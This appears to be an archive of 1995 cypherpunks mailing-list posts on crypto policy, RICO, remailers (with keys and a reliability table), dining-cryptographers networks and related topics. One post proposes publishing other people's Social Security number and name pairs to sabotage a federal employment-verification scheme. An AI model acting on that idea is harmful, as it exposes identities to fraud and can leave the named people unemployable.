Oh 43560 Fax: 419-885-2814 Internet consulting, HTML programing, Information brokering From bdavis at thepoint.net Sun Jul 16 19:55:38 1995 From: bdavis at thepoint.net (Brian Davis) Date: Sun, 16 Jul 95 19:55:38 PDT Subject: RICO and Asset Forfeitures In-Reply-To: Message-ID: On Sun, 16 Jul 1995, Timothy C. May wrote: > At 12:59 PM 7/16/95, Andrew Spring wrote: > >>ranked as a mobster subject to RICO. My guess is that the intent is that > >>from one placement on an FTP server or one posting to a newsgroup, the > >>perpetrator of that heinous act will have passed his RICO qualification and > >>therefore be subject to having all he owns taken from him. > > > >RICO question: i thought that the idea of RICO is to confiscate assets of > >racketeers that are derived from criminal activities. PGP and remailer > >software is distributed free. so would RICO seizures even apply (yes I > >know this doesnt' always stop the FBI)? > > As I understand RICO (Racketeer-Influenced and Corrupt Organizations Act, > though the euphonious "Rico," a la South American drug kingpins, is the > real reason for the name), only the assets imputed to the illegal act can > be seized. Thus, boats, factories, houses, etc., that are imputed > (believed, claimed) to have been bought partially or wholly from funds from > illegal acts can be seized. > Assets directly traceable to criminal activity can be forfeited in a civil proceeding. "Substitute assets" (when the assets obtained directly from the criminal activity have been dissipated or just can't be found) can be forfeited in a criminal forfeiture (that is, as part of an indictment...). > Civil penalties are another matter. If you're charged with distributing > something illegal and a fine of $250,000 is levied, then you may have to > sell everything you own to pay it, but it's not a RICO seizure. > > --Tim May > EBD From loki at obscura.com Sun Jul 16 23:25:43 1995 From: loki at obscura.com (Lance Cottrell) Date: Sun, 16 Jul 95 23:25:43 PDT Subject: Mixmaster@obscura.com back with new keys. Message-ID: <199507170624.XAA12232@obscura.com> Mixmaster at obscura.com is back. Obscura crashed last weekend, taking all data with it. The remailer is running again but the secret keys were lost. This remailer is running Mixmaster 2.0.1 and the latest Ghio type1 remailer for cypherpunk messages. Here is the mixmaster key: mix mixmaster at obscura.com db91418edac3a4d7329feaee0b79c74f 2.0.1 -----Begin Mix Key----- db91418edac3a4d7329feaee0b79c74f 258 AATL25WGQY5CMM0/xBjYtuN6IT75h+aBQwwKqZZc isOrqdsl8HWAzARrB0iAtcr34c2qqPBzSRNa5UE8 d3jOYu/wp9K9M5abUSRogcDl7gkPlqxc+e72SdKd 2Gdgib8VDGVLpJdaPk4uSY/pkmsYB30OaQH3W8dU PPciTvSJKAYcTQAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAQAB -----End Mix Key----- and here is the pgp key: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQBtAzAGIaQAAAEDAJpPdFihCI1Cfpc8njkqOSma/GVvS5nodpTnnff3B3RuZWJN bEvxC3s8TATo6f5JdXqOkZBXQCK+aHke4LKw+MGNNXBYeWH60NZ0IihVThHeyYqL f4ZQNJHlMlFfDrQEgQAFEbQqTWl4bWFzdGVyIFJlbWFpbGVyIDxtaXhtYXN0ZXJA b2JzY3VyYS5jb20+iQEVAwUQMAnzn/Pzr81BVjMVAQEzRQgAk3ansqZb2y8orEim 0igHJpA22J15l6tu5ZihHpnBbXJEqdDKvsp6P/LG+ZDBXa8bGGg7RxZ1xXFqVWSO kkv9iqcoMWB14VHzC5A6MckhkpUGqPt+HMyUEW/JnGzZ202Z4aaVXOjXMsLf5jo1 VIp94/8nQen+QJThpJLmaNGgl8z60skyXzbtoz93Wy6IZAQYYImeswSrYukO1wC6 FXy0/a3AkDjd7mJiCtA2m7tTxCZr2EBlSu4VemG1APmCTjh2f/wyXNU1iXmTDb7N QcplTAwpROrdvtBeslE+bzYqWZqipcFHHyW9W6YUVIr18cojt6k5GEVzI9WCEgAO v+kA1YkAlQMFEDAJ82xVZJN3Wse4ZQEBc7gD/izVs3+jXs3Ze+U+ZVmfO6guUcMU RB4VsNS6n5BHRm6KS7qXCXxHYc0tehkuHVuGD0riSaS232P0NNmp1D4dzXtUVQCY BZfMbWX4EooqHGGRAoqPGZuke8pZYfVGARUKFQB8+zqKGhCum8z1sbUPUgzR5bie Un9sktwsWEJEIcNoiQB1AwUQMAnxfeUyUV8OtASBAQF/5gL+OksEqwyBE+pUZCmN 1AXAmKlRxkd6gybJJl8lXOOa4KVGmSEroYW8pac+TlraJb6j90LvbqJ+7PHuMtHT 84uRna183HDqKOd6NMdwTTimE6ZGueGBB7mwIysaTU8oCZ66 =0s+r -----END PGP PUBLIC KEY BLOCK----- -Lance -- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche From martin at mrrl.lut.ac.uk Mon Jul 17 00:35:40 1995 From: martin at mrrl.lut.ac.uk (Martin Hamilton) Date: Mon, 17 Jul 95 00:35:40 PDT Subject: Free The World Web Server project.. :) In-Reply-To: <8AD5238.000300015E.uuout@famend.com> Message-ID: <199507170735.IAA06713@gizmo.lut.ac.uk> MONTY HARDER writes: | Anyone who has read MAD Magazine could put such together. As an added | bonus, use variable margin settings, and none of the letters would be | exactly the same. Appropriate Imail => FAX software on a puter in DC | (local call that way) with the phone number of the sender filled in on | the top line for ID (izzat legal?) so it doesn't look like a form letter | at all. Plus - choose the fonts & point sizes at random too ? :-) Martin From wilcoxb at nagina.cs.colorado.edu Mon Jul 17 00:39:07 1995 From: wilcoxb at nagina.cs.colorado.edu (Bryce Wilcox) Date: Mon, 17 Jul 95 00:39:07 PDT Subject: ECM list. In-Reply-To: <9507170051.AA06498@grape-nuts> Message-ID: <199507170738.BAA25016@nagina.cs.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- > For example, you might be holding $85.73 in digicash (having played the > various slot machine pages, maybe bought a sky photograph from the Bradford > telescope). That's just about right. > What would it take for you to buy more digicash? How about to sell it? Right now I am thinking of e$ as a "collectors item" or a fun thing to brag about in some distant year. I'm offering US$1.00 for e$15.00, but I will quit offering that price once I run out of US$ or decide that I have enough e$! I think that the ecm market is probably composed of very few people who mostly want to buy, and is therefore not a high-volume market! If the ecm market got a link from the DigiCash home page (which I'm sure it could do) then you would probably get lots of people who just got their free e$100.00 and who are willing to sell part of it after having experienced the wonders of the slot machines and the "e$0.01-per-move tic-tac-toe" games. Could we set up a WWW version of the ecm market, listing latest offers to anyone with a WWW browser? Things might really pick up-- at least for us buyers! I'm also considering other strategies for gaining e$-- offering a service on the DigiCash "cybershops" page, or just going to all my e-mail using friends, showing them how to get their free e$100.00, and then begging them to give me half of it. (Finder's fee? Friendly gift?) Possibly I shouldn't have posted the above and given my e$-collecting competitors the idea, because eventually DigiCash is going to quit giving out freebies! Hopefully my friends will get on the ball and acquire their freebies before that point! :-) [mental note to add some of said friends to the Cc: line...] Bryce P.S. Oh great. My "friends" are asking for the $1.00 for e$15.00 deal... signatures follow /=============------------ Bryce Wilcox, Programmer [THIS SPACE FOR RENT] bryce.wilcox at colorado.edu ------------=============/ E-mail is between you and me-- use PGP! -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBMAoTRZCUT4gUihHlAQEBMgQAueueOvkxSsVRBS20k49zUhOr8wa/CKcD vqsKLhHoeWhrXuYMKV5KTGgQ86TLwiu5n1C0fjomcJ+86UT1Py09i+yfeBj956hH sMFoGHgu4jKtQPZ94FsmsCzfDXPF6htnuOnQYjSrAydckomZoiQfPICDFRGeiSTp FbXeDMRMrMs= =1z8A -----END PGP SIGNATURE----- From stewarts at ix.netcom.com Mon Jul 17 01:29:13 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 17 Jul 95 01:29:13 PDT Subject: Mods to Dining Cryptographers: legal questions... Message-ID: <199507170827.BAA12420@ix6.ix.netcom.com> At 10:02 AM 7/15/95 -0500, Phil Fraering wrote: >I'm sorry if I was a little mysterious about my reference to >another use or mode of a DC-net; I'd _love_ to tell the rest of >you flat-out, and put the idea in the public domain, but I'm >not sure I _CAN_. ..... >Are there any patents on Dining-Cryptographers networks that could >interfere with the placing in the public domain, or the patenting, of >an improvement to the network system? Case 1 - you want to be able to patent your stuff yourself. Case 2 - you don't. For Case 1, I can't help you much, but US patent law lets you apply for a patent on something within one year of publication (most other countries don't allow that - if you publish before applying, you don't get to patent it.) So publish. For Case 2, publish. You could get fancy and use surety.com's date-stamping service to keep a copy of what and when you published. If the material you've developed was already invented, and patented, by someone else, it's still ok to publish it, you just can't use the stuff (except for research, etc.) (I've been burned by this one; I _thought_ my idea seemed obvious enough that somebody else should have already thought of it first :-) So if you're trying to put something in the public domain, you may want to put a footnote in it saying that you're not making any claims about other people's previous patent applications, etc. So, anyway, what's your new idea? # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com From stewarts at ix.netcom.com Mon Jul 17 01:29:17 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 17 Jul 95 01:29:17 PDT Subject: Deployment Message-ID: <199507170827.BAA12427@ix6.ix.netcom.com> > > So, anyone want to volunteer to port Privtool to Windows ? > Uh, pardon my ignorance, but what is privtool, and why is it > a good thing to port it to windows? > (As compared to the task of integrating PGP into microsofts > mail tool.) It's an open-system mail tool resembling Sun's mailtool with PGP support added. Open-system tools are one of those vanguard things :-) (So are convenient GUI-development tools.) I no longer have a nearby Sun machine to play on, so I haven't played with it, but if it's got a well-done interface it's worth porting or stealing concepts from to include in other systems. I've heard that Microsoft's new mail tools are far less brain-damaged than the Microsoft Mail I've grown to know and hate, which assumes any message that's more than a few lines will be an attached document with maybe some optional intro and leftover mail headers, and chokes on messages with more than 30K of text in the body (choking badly on more than 64K). (Apparently, part of the reason for this evil is the fault of Visual Basic and/or Visual C++, which are convenient GUI development tools...) On the other hand, integrating it into Free Eudora for Windows would be pleasant, if that's doable (I forget it source is available.) # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com From stewarts at ix.netcom.com Mon Jul 17 01:29:41 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 17 Jul 95 01:29:41 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) Message-ID: <199507170827.BAA12413@ix6.ix.netcom.com> At 01:59 PM 7/16/95 +0100, Andrew Spring wrote: >RICO question: i thought that the idea of RICO is to confiscate assets of >racketeers that are derived from criminal activities. PGP and remailer >software is distributed free. so would RICO seizures even apply (yes I >know this doesnt' always stop the FBI)? You _were_ using that software on a _computer_ weren't you? Guess it's one of your racketeer's tools, so we'll have to take it for ourselves, er, um, for evidence and protection of national security.... # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com From stewarts at ix.netcom.com Mon Jul 17 01:30:35 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 17 Jul 95 01:30:35 PDT Subject: A Chronology on crypto bans Message-ID: <199507170827.BAA12430@ix6.ix.netcom.com> At 04:08 PM 7/16/95 -0400, Dave Banisar wrote: >Someone asked why is there such a flurry recently on banning crypto in >recent months. This is not a recent issue. There have been almost non-stop >attempts for the last 15 years. True, though there have been more and louder calls for banning crypto as it becomes more widely used, and as the Internet and electronic commerce make its use more relevant. The number of cats running around outside of bags has been increasing, so the effort of the politicians to herd them back in has become more and more noticeable. A lot of it has been good public relations but the Good Guys as well - back in the late 70s, when I started following it, crypto was mostly for spooks, bankers, and academic math nerds*; PGP and the government's persecution of Phil have made a lot of people aware that the stakes are high and the Bad Guys are serious, and the Clipper Chip sounded enough like "The Feds want to tap my phone" that the general public could understand, a bit, that this was something that affected them... It's also been technology - real crypto needs computers, and computers have gone from million-dollar room-fillers that you might use at work or university to appliances you can buy at WalMart, like tv sets, which your kids use for school, if you don't count game machines, which your kids can buy at K-mart... Suddenly a third of the country's got a machine they can do real crypto on, and for 10 bucks a month they can be on a world-wide email network. And it's mostly the _rich_ third of the country, who might want to do their home banking somewhere a bit less taxing than before. Oh, yeah, there's also drugs - folks might want to use the Home Shopping Internet for more than just fake jewelry :-) * at the time, I was an academic math nerd designing banking networks at the phone company, and my department also did studies for spooks... # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com From jya at pipeline.com Mon Jul 17 03:58:13 1995 From: jya at pipeline.com (John Young) Date: Mon, 17 Jul 95 03:58:13 PDT Subject: NSA and NatSec Looks Message-ID: <199507171058.GAA07387@pipe1.nyc.pipeline.com> There's a pretty good recent overview of NSA -- history, organization, operations and, best, facilities -- at: URL: http://www.fas.org/pub/gen/fas/irp/nsa/ This is part of the Federation of American Scientists (FAS) web site, cited here by Jim Gillogly in connection with the VENONA papers. There are links to a bounty of other information on national security and governmental secrecy. Among many sweetmeats, the homepage on "Cyberstrategy" may be of interest (John Pike's project): URL: http://www.fas.org/pub/gen/iswg/cyberstr.html From pgf at tyrell.net Mon Jul 17 05:57:23 1995 From: pgf at tyrell.net (Phil Fraering) Date: Mon, 17 Jul 95 05:57:23 PDT Subject: Here it is; bi-directional dining cryptographers In-Reply-To: Message-ID: <199507171252.AA14868@tyrell.net> Andrew, in the longer version of the description, I postulated that the data broadcast by Alice and Bob would be compressed and without headers; I was hoping that would be enough to defeat any likely cryptanalysis. Hmm... maybe some other format. Phil From pgf at tyrell.net Mon Jul 17 05:58:25 1995 From: pgf at tyrell.net (Phil Fraering) Date: Mon, 17 Jul 95 05:58:25 PDT Subject: Here it is; bi-directional dining cryptographers In-Reply-To: Message-ID: <199507171253.AA14941@tyrell.net> BTW, they're not added together per se; they're XOR'd together. Does this make a difference? Phil From raph at CS.Berkeley.EDU Mon Jul 17 06:50:38 1995 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Mon, 17 Jul 95 06:50:38 PDT Subject: List of reliable remailers Message-ID: <199507171350.GAA13217@kiwi.cs.berkeley.edu> I operate a remailer pinging service which collects detailed information about remailer features and reliability. To use it, just finger remailer-list at kiwi.cs.berkeley.edu There is also a Web version of the same information, plus lots of interesting links to remailer-related resources, at: http://www.cs.berkeley.edu/~raph/remailer-list.html This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail, which is available at: ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33.tar.gz For the PGP public keys of the remailers, as well as some help on how to use them, finger remailer.help.all at chaos.taylored.com This is the current info: REMAILER LIST This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu. $remailer{"vox"} = " cpunk pgp. post"; $remailer{"avox"} = " cpunk pgp post"; $remailer{"extropia"} = " cpunk pgp special"; $remailer{"portal"} = " cpunk pgp hash"; $remailer{"alumni"} = " cpunk pgp hash"; $remailer{"bsu-cs"} = " cpunk hash ksub"; $remailer{"rebma"} = " cpunk pgp. hash"; $remailer{"c2"} = " eric pgp hash reord"; $remailer{"penet"} = " penet post"; $remailer{"ideath"} = " cpunk hash ksub reord"; $remailer{"hacktic"} = " cpunk mix pgp hash latent cut post ek"; $remailer{"flame"} = " cpunk mix pgp. hash latent cut post ek reord"; $remailer{"rahul"} = " cpunk pgp hash filter"; $remailer{"syrinx"} = " cpunk pgp reord mix post"; $remailer{"tower"} = " cpunk pgp post"; $remailer{"ford"} = " cpunk pgp"; $remailer{"hroller"} = " cpunk pgp hash mix cut ek"; $remailer{"vishnu"} = " cpunk mix pgp hash latent cut ek ksub reord"; $remailer{"crown"} = " cpunk pgp hash latent cut mix ek reord"; $remailer{"replay"} = " cpunk mix pgp hash latent cut post ek"; $remailer{"spook"} = " cpunk mix pgp hash latent cut ek"; $remailer{"gondolin"} = " cpunk mix hash latent cut ek ksub reord"; $remailer{"rmadillo"} = " mix cpunk pgp hash latent cut"; catalyst at netcom.com is _not_ a remailer. lmccarth at ducie.cs.umass.edu is _not_ a remailer. usura at replay.com is _not_ a remailer. Use "premail -getkeys pgpkeys at kiwi.cs.berkeley.edu" to get PGP keys for the remailers. Fingering this address works too. 21 Apr 1995: The new version of premail (0.33) is out, with direct posting, perl5 and better MH support, and numerous bug fixes. Last ping: Mon 17 Jul 95 6:00:03 PDT remailer email address history latency uptime ----------------------------------------------------------------------- hacktic remailer at utopia.hacktic.nl *+*+****+*** 14:18 99.99% rmadillo remailer at armadillo.com +++++++++++* 49:27 99.99% spook remailer at spook.alias.net ********--** 1:32:17 99.99% flame remailer at flame.alias.net ++++++++-+++ 57:13 99.99% syrinx syrinx at c2.org -------+--- 1:44:52 99.99% replay remailer at replay.com *+*+**+*+*** 13:59 99.95% vox remail at vox.xs4all.nl -..--.-.---- 12:41:56 99.99% bsu-cs nowhere at bsu-cs.bsu.edu .**+*#*###*- 54:07 99.90% crown mixmaster at kether.alias.net --------+- 1:12:09 99.89% portal hfinney at shell.portal.com *****#*##### 2:18 99.82% alumni hal at alumni.caltech.edu *****#*#*#*# 3:02 99.82% vishnu mixmaster at vishnu.alias.net -**+** ++*** 20:02 98.62% gondolin mixmaster at gondolin.org -**-**++*--- 1:17:43 98.56% c2 remail at c2.org -*++++++-++ 42:52 98.03% extropia remail at extropia.wimsey.com -..--.-_ -- 14:50:37 97.80% ideath remailer at ideath.goldenbear.com _ --...... 17:04:28 96.35% ford remailer at bi-node.zerberus.de #-#+# 1:52:55 96.09% hroller hroller at c2.org ++***# +*-++ 12:53 94.98% penet anon at anon.penet.fi --+++-- --++ 2:59:39 92.16% rebma remailer at rebma.mn.org -_++_.-+--+ 15:25:46 91.39% rahul homer at rahul.net *++*+++*##+- 10:33 99.94% tower remailer at tower.techwood.org 6:44 1.46% For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html History key * # response in less than 5 minutes. * * response in less than 1 hour. * + response in less than 4 hours. * - response in less than 24 hours. * . response in more than 1 day. * _ response came back too late (more than 2 days). cpunk A major class of remailers. Supports Request-Remailing-To: field. eric A variant of the cpunk style. Uses Anon-Send-To: instead. penet The third class of remailers (at least for right now). Uses X-Anon-To: in the header. pgp Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID. hash Supports ## pasting, so anything can be put into the headers of outgoing messages. ksub Remailer always kills subject header, even in non-pgp mode. nsub Remailer always preserves subject header, even in pgp mode. latent Supports Matt Ghio's Latent-Time: option. cut Supports Matt Ghio's Cutmarks: option. post Post to Usenet using Post-To: or Anon-Post-To: header. ek Encrypt responses in reply blocks using Encrypt-Key: header. special Accepts only pgp encrypted messages. mix Can accept messages in Mixmaster format. reord Attempts to foil traffic analysis by reordering messages. Note: I'm relying on the word of the remailer operator here, and haven't verified the reord info myself. mon Remailer has been known to monitor contents of private email. filter Remailer has been known to filter messages based on content. If not listed in conjunction with mon, then only messages destined for public forums are subject to filtering. Raph Levien From frissell at panix.com Mon Jul 17 07:42:11 1995 From: frissell at panix.com (Duncan Frissell) Date: Mon, 17 Jul 95 07:42:11 PDT Subject: Proposed SS#/Federal Job Licensing DOS Attack Message-ID: <199507171441.KAA02622@panix.com> On another subject entirely... I have naturally been concerned about the Feds' proposal to set up a national job licensing system. In order to protect us from hordes of illegals, they have suggested that employers be required to check SS#-True Name matches before employment could begin. This amounts to requiring federal permission for the 55 million annual job changes. Initially, it is supposed to be restricted to checking SS# validity, name match, and non multiple use. Later (as with driver's licenses) they will add restrictions having to do with tax compliance, child support compliance, library fine compliance, etc. After all, we wouldn't want tax evading, deadbeat dad, library scofflaws working in Amerika, would we? This suggests am interesting Denial of Service (DOS) attack. If you published your own or others' SS#-True Name pairs on a public forum (currently completely legal BTW), multiple use could be encouraged, the TrueNames would become unemployable, and interesting litigation would result. If done enough, systemic breakdown would occur. I am anxious to see the regs (they are just at the talking stage) to see how they handle "exceptions" like thus. DCF "Who in spite of the fact that he has changed jobs since November 1986, has yet to fill out an I-9 form. He *loves* contract employment." From dursi at lola.phy.QueensU.CA Mon Jul 17 08:00:43 1995 From: dursi at lola.phy.QueensU.CA (Jonathan Dursi) Date: Mon, 17 Jul 95 08:00:43 PDT Subject: Free The World Web Server project.. :) Message-ID: <9507171456.AA16986@duke> -----BEGIN PGP SIGNED MESSAGE----- > > Expecially if the form letter generated would be randomly selected > >from parallel word streams. For example: > [...] > > You get the idea. > Rather than spend five minutes writing something on your own you'd end > up something that looks totally fake. I believe that what is going on > would be discerned by a staffer in moments. Well, it would be just as easy (although, admittedly, somewhat less convenient to the users) to have the web page such that the users could type in the letter, with some ``suggested text'' (perhaps randomly generated as above), perhaps even as the default; then it's just a matter of editing a few sentances, and maybe adding a paragraph or two... then click, and it's off. It wouldn't be as convenient as just-click-and-a-letter-will-be-sent, but it's still more convenient than having to write the letter yourself, which means that it'll generate more traffic... - Jonathan - --- Jonathan Dursi | "Never attribute to malice dursi at astro.queensu.ca | what can adequately be explained | by stupidity." - Hanlon's Razor -----BEGIN PGP SIGNATURE----- Version: 2.6.i iQBVAgUBMAp5/BJH45PFiKyNAQGYJQH/Uo3k45i73U8qQA1/y5LeXPso07LAPCwo 5i0xkFudoK2/Q5H7Gm7xmygNXIkckhuK/X/kJvdCf2khRluP8y/c7w== =jwye -----END PGP SIGNATURE----- From cme at TIS.COM Mon Jul 17 08:09:20 1995 From: cme at TIS.COM (Carl Ellison) Date: Mon, 17 Jul 95 08:09:20 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) In-Reply-To: Message-ID: <9507171457.AA09146@tis.com> >Date: Sun, 16 Jul 1995 00:41:03 -0400 (EDT) >From: Brian Davis > >On Fri, 14 Jul 1995, Carl Ellison wrote: >... >> The last >> $9M (I believe it was) went to buying up AT&T DES phones to be made into >> Clipper phones. Of course, the conversion hasn't happened yet and the DES >> phones are sitting in a warehouse someplace -- but the $9M fund went to > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ >Nope. There is one right here in my office. And it makes me feel so >safe and secure. The $9M didn't buy *all* of the AT&T phones. TIS has 2 of them. Bruce Schneier has 1. Whit Diffie has one that I've seen. However, all the ones it did buy are apparently in a warehouse, gathering dust. - Carl +--------------------------------------------------------------------------+ |Carl M. Ellison cme at acm.org http://www.clark.net/pub/cme/home.html | |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2 | | ``Officer, officer, arrest that man! He's whistling a dirty song.'' | +----------------------------------------------------------- Jean Ellison -+ From talon57 at well.com Mon Jul 17 08:34:21 1995 From: talon57 at well.com (Brian D Williams) Date: Mon, 17 Jul 95 08:34:21 PDT Subject: "Zodiac" Message-ID: <199507171534.IAA22791@well.com> Neal Stephenson's novel "Zodiac" (an Eco-thriller) has been re- released in a new paperback edition. I loved it! ObCrypto: you'll have to read the book to find out... Ok....actually none, but Neal's fans here on the list will enjoy the book! Flame away.... Brian D Williams Cypherpatriot " I'm not a spin Doctor, but I play one on the Internet." From frissell at panix.com Mon Jul 17 08:39:14 1995 From: frissell at panix.com (Duncan Frissell) Date: Mon, 17 Jul 95 08:39:14 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) Message-ID: <199507171504.LAA07652@panix.com> At 05:18 AM 7/15/95 PDT, Jim Gillogly wrote: > >> silly at ugcs.caltech.edu ((me)) writes: >> Help! What does GAK stand for? I've seen it a billion times, > >Government Access to Keys; also seen as GACK (Crypto Keys). This is more >descriptive and accurate than calling it Key Escrow, since escrow is for >the benefit of the parties involved in a transaction. Or we might use Sandy Sandfort's suggestion "key forfeiture" derived from asset forfeiture. DCF "Isn't it peculiar how nature doth contrive that every boy and every girl who's born into this world alive is either a little libertarian or else a little goddamn fascist bastard." -- Just getting it out of my system before Exon. From tcmay at sensemedia.net Mon Jul 17 09:05:25 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Mon, 17 Jul 95 09:05:25 PDT Subject: Automated Rant Generators and Letter Generators Message-ID: At 7:35 AM 7/17/95, Martin Hamilton wrote: >MONTY HARDER writes: > >| Anyone who has read MAD Magazine could put such together. As an added >| bonus, use variable margin settings, and none of the letters would be >| exactly the same. Appropriate Imail => FAX software on a puter in DC >| (local call that way) with the phone number of the sender filled in on >| the top line for ID (izzat legal?) so it doesn't look like a form letter >| at all. > >Plus - choose the fonts & point sizes at random too ? :-) Yes, make your letters to Congressmen look like ransom notes...it really gets their attention! Seriously, I have no doubt that the next generation of "direct mail" will be geared toward automatic generation of personalized letters, using various natural language parser generators (a la the "rant generator" many of us have used), variable fonts and margins, and so on. This will further "flood the channel" and will ultimately make letter writing mostly meaningless. IN my case, I skip most letters to the editor--at least for local newspapers and weeklies--as they look to be automatically written ("I am outraged at your article about converting Lighthouse Point into a nuclear-powered whale-packing plant..."). Cypherpunks could probably have an effect on hastening this "denial of service" attack on the efficacy of letter-writing by releasing an easy-to-use package that does all this letter writing at the click of a button....just type in some key words, for the topics, and it does the rest. An interesting project, actually. --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From danisch at ira.uka.de Mon Jul 17 09:07:25 1995 From: danisch at ira.uka.de (Hadmut Danisch) Date: Mon, 17 Jul 95 09:07:25 PDT Subject: Anti-Electronic Racketeering Act of 1995 Message-ID: <9507171606.AA10619@elysion.iaks.ira.uka.de> I am not familiar with american laws and have two questions: 1. If the bill becomes law, how can someone who violates it be punished? 2. Does someone who publishes software which encodes or encrypts (ASCII is a code, isn't it?) have to prove that he has provided the universal decoder to the state or does the state have to prove that he didn't do? In the former case, does he get any receipt from the department of justice and what does the receipt say (1.3MByte of software received...)? In the latter case, how do they want to prove he didn't? If he gave just a big for(i=0;;i++) try_key(i); how do they want to prove this doesn't work? There is a certain problem in theory. I don't know the english name, but in german it is called the 'halt problem'. It is not a simple task to prove that a certain turing machine program doesn't stop or doesn't find a solution of a given problem. How do they want to prove that the program provided to the department of justice doesn't find the key just within the next 10 seconds? Hadmut From Michael at umlaw.demon.co.uk Mon Jul 17 09:26:13 1995 From: Michael at umlaw.demon.co.uk (Michael Froomkin) Date: Mon, 17 Jul 95 09:26:13 PDT Subject: Root Causes Message-ID: <2448@umlaw.demon.co.uk> Jim didn't take my Con Law I course. In message <199507161819.OAA06090 at bb.hks.net> Jim Ray writes: [cuts throughout] > > Amendment IX -- "The enumeration in the Constitution of certain rights > shall not be construed to deny or disparage others retained by the people." ^^^^^^^ > [The right to write code was among many rights NOT enumerated.] > Very hard to argue that the right to write code (as opposed to, say, the right to write in code) existed in the late 18th century; hence it is hard to argue that it could be "retained" today. Assuming that the ninth amendment has, or could have, teeth, it is unlikely to go beyond rights existing or closely analogous to those held by "the people" [free white males, more likely] at the time of the amendment's ratification. Just as well if you think about it carefully. -- Michael Froomkin until Aug 6: michael at umlaw.demon.co.uk U.Miami School of Law London, England mfroomki at umiami.ir.miami.edu <-- this will still find me PO Box 248087 Coral Gables, FL 33124-8087 Rain. Sun. Rain. Sun. Rain. From joelm at eskimo.com Mon Jul 17 09:39:26 1995 From: joelm at eskimo.com (Joel McNamara) Date: Mon, 17 Jul 95 09:39:26 PDT Subject: Windows secret-sharing Message-ID: <199507171638.JAA14534@mail.eskimo.com> I just uploaded a user-friendly, Windows front-end to Hal Finney's SECSPLIT.EXE (based on Shamir's secret-sharing) called Secret Sharer. The interface supports splitting and restoring files or passphrases. Nothing fancy, but a simple solution for Windows users who want to do their own key (or whatever) escrow. Secret Sharer is freeware, and is available from either: http://www.eskimo.com/~joelm ftp.eskimo.com /joelm/secshare.zip I'm probably being over-cautious, but because of ITAR, SECSPLIT.EXE is not included in the ZIP file. FTP sites for downloading are listed in the docs though. Comments, bug reports, etc. appreciated before I announce to the relevant newsgroups. Joel McNamara joelm at eskimo.com - http://www.eskimo.com/~joelm for PGP key From sdw at lig.net Mon Jul 17 10:18:29 1995 From: sdw at lig.net (Stephen D. Williams) Date: Mon, 17 Jul 95 10:18:29 PDT Subject: speeding detected by civilians In-Reply-To: Message-ID: > > In article <3u4g3t$pn8 at nntp.crl.com> Buzz at static.noise.net (Buzz White) writes: > > >> Vernon Hills, Illinois, a Chicago suburb, has passed legislation allowing > >> citizens to check out radar guns from the local police department to > >> catch speeders in their community. The radar guns are combined with > >> cameras in order to instantaneously capture the car, license number, and the > >> rate of speed. The citizens can check out the units for a week at a time. The > >> police have stated that they, at this time, will use the data to issue > >> warning letters to the violaters. > > Can they use them to bust COPS that speed? Heh heh. > > If Vernon Hills has any citizens left with spines, you can bet that > the local police are going to start to get a couple hundred pictures > of cop cars per week... Hell, I'll bet that I could take that many > by *myself* :) I'm absolutely dying to do that with cops around here (N.VA/Tysons) area... I got a ticket at 2:30 AM while my car was on cruise at 55MPH, almost no hills, guy said he 'paced' me for about a mile doing 70 2-3 miles before he stopped me, yet he was too lazy to use his radar... I paid $40 and spent a few hours getting an officially certified speedometer test, etc. Still trying to go to court: first date was for July 3rd, which they decided at the last minute to take as vacation, told me to appear July 5th, when I found out that the continuance was for Aug 9. (For a June 5th or so ticket. After 50 calls to the court house trying to get through, I found out that the officers don't even have to turn in paperwork unless I don't pay the bond and then they just turn it in 4-5 days before the court date. The parking meter at the courthouse was fraudulent (20 min for my $.25 for 30 min fee), and I've noted numerous speeding and illegal Uturns, parking in active roadway's without lights, etc. offences by local police... sdw > -- > Roger Williams -- Coelacanth Engineering -- Middleborough, Mass sdw -- Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw at lig.net http://www.lig.net/sdw Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 